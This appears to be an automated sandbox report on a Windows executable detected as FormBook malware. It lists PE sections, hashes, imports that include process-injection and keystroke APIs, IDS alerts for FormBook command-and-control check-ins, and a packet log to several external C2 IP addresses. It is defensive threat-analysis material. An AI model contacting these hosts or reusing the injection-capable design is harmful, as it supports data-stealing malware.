Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5d700	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x125000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5d700	0x5d800	f243b79c898031cf6c8a03a6a44bfc60	False	0.9296822777406417	data	7.897930309973797	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x125000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x549c5	data			1.0003347135457994
RT_GROUP_ICON	0x124180	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1241f8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x12420c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x124220	0x14	data	English	Great Britain	1.25
RT_VERSION	0x124234	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x124310	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:19:04.222272+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49940	38.47.233.21	80	TCP
2025-01-10T20:19:04.222272+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49940	38.47.233.21	80	TCP
2025-01-10T20:19:21.140126+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49975	172.67.137.47	80	TCP
2025-01-10T20:19:23.685783+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49976	172.67.137.47	80	TCP
2025-01-10T20:19:26.524559+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49977	172.67.137.47	80	TCP
2025-01-10T20:19:28.892813+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49978	172.67.137.47	80	TCP
2025-01-10T20:19:28.892813+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49978	172.67.137.47	80	TCP
2025-01-10T20:19:36.245732+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49980	206.238.89.119	80	TCP
2025-01-10T20:19:38.792673+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49981	206.238.89.119	80	TCP
2025-01-10T20:19:41.339519+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49982	206.238.89.119	80	TCP
2025-01-10T20:20:03.931160+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49983	206.238.89.119	80	TCP
2025-01-10T20:20:03.931160+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49983	206.238.89.119	80	TCP
2025-01-10T20:20:09.629779+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49984	66.29.149.46	80	TCP
2025-01-10T20:20:12.712973+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49985	66.29.149.46	80	TCP
2025-01-10T20:20:14.779507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49986	66.29.149.46	80	TCP
2025-01-10T20:20:17.190877+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49987	66.29.149.46	80	TCP
2025-01-10T20:20:17.190877+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49987	66.29.149.46	80	TCP
2025-01-10T20:20:22.898570+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49988	217.70.184.50	80	TCP
2025-01-10T20:20:25.474482+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49989	217.70.184.50	80	TCP
2025-01-10T20:20:28.040899+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49990	217.70.184.50	80	TCP
2025-01-10T20:20:30.582222+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49991	217.70.184.50	80	TCP
2025-01-10T20:20:30.582222+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49991	217.70.184.50	80	TCP
2025-01-10T20:20:37.040856+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49992	13.228.81.39	80	TCP
2025-01-10T20:20:39.798456+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49993	13.228.81.39	80	TCP
2025-01-10T20:20:42.148536+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49994	13.228.81.39	80	TCP
2025-01-10T20:20:44.725046+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49995	13.228.81.39	80	TCP
2025-01-10T20:20:44.725046+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49995	13.228.81.39	80	TCP
2025-01-10T20:20:50.252437+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49996	13.248.169.48	80	TCP
2025-01-10T20:20:53.839686+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49997	13.248.169.48	80	TCP
2025-01-10T20:20:55.330493+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49998	13.248.169.48	80	TCP
2025-01-10T20:21:06.928431+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49999	13.248.169.48	80	TCP
2025-01-10T20:21:06.928431+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49999	13.248.169.48	80	TCP
2025-01-10T20:21:13.496036+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50000	104.21.96.1	80	TCP
2025-01-10T20:21:16.042857+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50001	104.21.96.1	80	TCP
2025-01-10T20:21:18.728968+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50002	104.21.96.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:19:03.311424971 CET	49940	80	192.168.2.5	38.47.233.21
Jan 10, 2025 20:19:03.316247940 CET	80	49940	38.47.233.21	192.168.2.5
Jan 10, 2025 20:19:03.316602945 CET	49940	80	192.168.2.5	38.47.233.21
Jan 10, 2025 20:19:03.376096964 CET	49940	80	192.168.2.5	38.47.233.21
Jan 10, 2025 20:19:03.381098032 CET	80	49940	38.47.233.21	192.168.2.5
Jan 10, 2025 20:19:04.222085953 CET	80	49940	38.47.233.21	192.168.2.5
Jan 10, 2025 20:19:04.222163916 CET	80	49940	38.47.233.21	192.168.2.5
Jan 10, 2025 20:19:04.222271919 CET	49940	80	192.168.2.5	38.47.233.21
Jan 10, 2025 20:19:04.225775003 CET	49940	80	192.168.2.5	38.47.233.21
Jan 10, 2025 20:19:04.230670929 CET	80	49940	38.47.233.21	192.168.2.5
Jan 10, 2025 20:19:20.053858042 CET	49975	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:20.058820009 CET	80	49975	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:20.058916092 CET	49975	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:20.073458910 CET	49975	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:20.078474045 CET	80	49975	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:21.138983011 CET	80	49975	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:21.140041113 CET	80	49975	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:21.140125990 CET	49975	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:21.589457035 CET	49975	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:22.608325005 CET	49976	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:22.613219023 CET	80	49976	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:22.613317013 CET	49976	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:22.628391981 CET	49976	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:22.633218050 CET	80	49976	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:23.685231924 CET	80	49976	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:23.685712099 CET	80	49976	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:23.685782909 CET	49976	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:24.136424065 CET	49976	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:25.155101061 CET	49977	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:25.318737030 CET	80	49977	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:25.319091082 CET	49977	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:25.333007097 CET	49977	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:25.337829113 CET	80	49977	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:25.337977886 CET	80	49977	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:26.523648024 CET	80	49977	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:26.524467945 CET	80	49977	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:26.524559021 CET	49977	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:26.839540958 CET	49977	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:27.858398914 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:27.863323927 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:27.863425970 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:27.872736931 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:27.877465963 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:28.892595053 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:28.892612934 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:28.892812967 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:28.893814087 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:28.893867970 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:28.895971060 CET	49978	80	192.168.2.5	172.67.137.47
Jan 10, 2025 20:19:28.900774002 CET	80	49978	172.67.137.47	192.168.2.5
Jan 10, 2025 20:19:34.706779957 CET	49980	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:34.711637974 CET	80	49980	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:34.711760998 CET	49980	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:34.733702898 CET	49980	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:34.738655090 CET	80	49980	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:36.245732069 CET	49980	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:36.291831970 CET	80	49980	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:37.264842033 CET	49981	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:37.269720078 CET	80	49981	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:37.269877911 CET	49981	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:37.284609079 CET	49981	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:37.289829969 CET	80	49981	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:38.792673111 CET	49981	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:38.840276003 CET	80	49981	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:39.811698914 CET	49982	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:39.816493988 CET	80	49982	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:39.816581964 CET	49982	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:39.831163883 CET	49982	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:39.836013079 CET	80	49982	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:39.836153030 CET	80	49982	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:41.339519024 CET	49982	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:41.387753963 CET	80	49982	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:42.358428001 CET	49983	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:42.363353014 CET	80	49983	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:42.363477945 CET	49983	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:42.372986078 CET	49983	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:42.378638983 CET	80	49983	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:56.118325949 CET	80	49980	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:56.118710995 CET	49980	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:19:58.650810003 CET	80	49981	206.238.89.119	192.168.2.5
Jan 10, 2025 20:19:58.650919914 CET	49981	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:20:01.210402966 CET	80	49982	206.238.89.119	192.168.2.5
Jan 10, 2025 20:20:01.210470915 CET	49982	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:20:03.930977106 CET	80	49983	206.238.89.119	192.168.2.5
Jan 10, 2025 20:20:03.931159973 CET	49983	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:20:03.932068110 CET	49983	80	192.168.2.5	206.238.89.119
Jan 10, 2025 20:20:03.936927080 CET	80	49983	206.238.89.119	192.168.2.5
Jan 10, 2025 20:20:08.950938940 CET	49984	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:08.955811977 CET	80	49984	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:08.955915928 CET	49984	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:08.970350981 CET	49984	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:08.975162983 CET	80	49984	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:09.629398108 CET	80	49984	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:09.629707098 CET	80	49984	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:09.629779100 CET	49984	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:10.480144978 CET	49984	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:11.498919010 CET	49985	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:11.503737926 CET	80	49985	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:11.503835917 CET	49985	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:11.518208027 CET	49985	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:11.523022890 CET	80	49985	66.29.149.46	192.168.2.5
